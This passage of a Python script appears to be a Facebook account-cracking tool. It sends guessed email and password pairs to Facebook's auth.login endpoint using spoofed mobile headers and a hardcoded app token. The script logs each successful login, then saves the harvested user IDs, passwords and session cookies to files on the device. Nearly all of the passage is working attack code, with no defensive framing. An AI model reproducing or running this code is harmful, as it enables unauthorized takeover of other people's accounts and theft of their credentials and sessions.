    'referer': 'https://p.facebook.com/?stype=lo&jlou=Afe-BgFAnMoaDaaWSex_hwYvOXhlH29zPLGugq4rGZlsdB4pIG53PcTllr1fKg0ucOAAMQauolYURntP_hN-GphcqbM_-miu9U-uFaJRY3Tp6Q&smuh=50232&lh=Ac-w9SdOH9EoFiHeCQY&wtsid=rdr_0xzZQAY95a7WgkiB5&_rdr',
    'sec-ch-prefers-color-scheme': 'light',
    'sec-ch-ua': '"Not:A-Brand";v="99", "Chromium";v="112"',
    'sec-ch-ua-full-version-list': '"Not:A-Brand";v="99.0.0.0", "Chromium";v="112.0.5615.137"',
    'sec-ch-ua-mobile': '?1',
    'sec-ch-ua-platform': '"Android"',
    'sec-ch-ua-platform-version': '"10.0.0"',
    'sec-fetch-dest': 'document',
    'sec-fetch-mode': 'navigate',
    'sec-fetch-site': 'same-origin',
    'sec-fetch-user': '?1',
    'upgrade-insecure-requests': '1',
    'user-agent': 'Mozilla/5.0 (Mobile; rv:48.0; A405DL) Gecko/48.0 Firefox/48.0 KAIOS/2.5',
}
			data = {"adid":str(uuid.uuid4()),"format":"json","device_id":str(uuid.uuid4()),"cpl":"true","family_device_id":str(uuid.uuid4()),"credentials_type":"device_based_login_password","error_detail_type":"button_with_disabled","source":"register_api","email":ids,"password":pas,"access_token":"350685531728|62f8ce9f74b12f84c123cc23437a4a32","generate_session_cookies":"1","meta_inf_fbmeta":"NO_FILE","advertiser_id":str(uuid.uuid4()),"currently_logged_in_userid":"0","locale":"zh_HK","client_country_code":"HK","method":"auth.login","fb_api_req_friendly_name":"authenticate","fb_api_caller_class":"com.facebook.account.login.protocol.Fb4aAuthHandler","api_key":"882a8490361da98702bf97a021ddc14d"}
			po = requests.post('https://d.facebook.com/method/auth.login',data=data,headers=head).json()
			if "session_key" in po:
				uid = str(po['uid'])
				token = po['access_token']
				print('\r\r\033[1;32m [ALI-OK] '+uid+' | '+pas)
				oks.append(ids)
				open('/sdcard/ALI/ALI-R-OK.txt','a').write(uid+'|'+pas+'\n')
				session = po['session_cookies'];cookie = '';cuser = session[0];cuser = session[0]['name']+'='+session[0]['value'];cookie+=cuser+';';xs = session[1]['name']+'='+session[1]['value'];cookie+=xs+';';fr = session[2]['name']+'='+session[2]['value'];cookie+=fr+';';datr = session[3]['name']+'='+session[3]['value'];cookie+=datr+';dpr=2;locale=en_US;wd=950x1835;';pagevoice = cuser.replace('c_user','m_page_voice');cookie+=pagevoice
				open('/sdcard/ALI/ALI-R-OK-COKI.txt','a').write(ids+'|'+pas+'|'+cookie+'\n')
				break
		loop+=1
	except requests.exceptions.ConnectionError:
		time.sleep(20)
	except Exception as e:
		pass

try:main()
except requests.exceptions.ConnectionError:
	print('\n No internet connection ...')
except Exception as e:pass
#rnd()
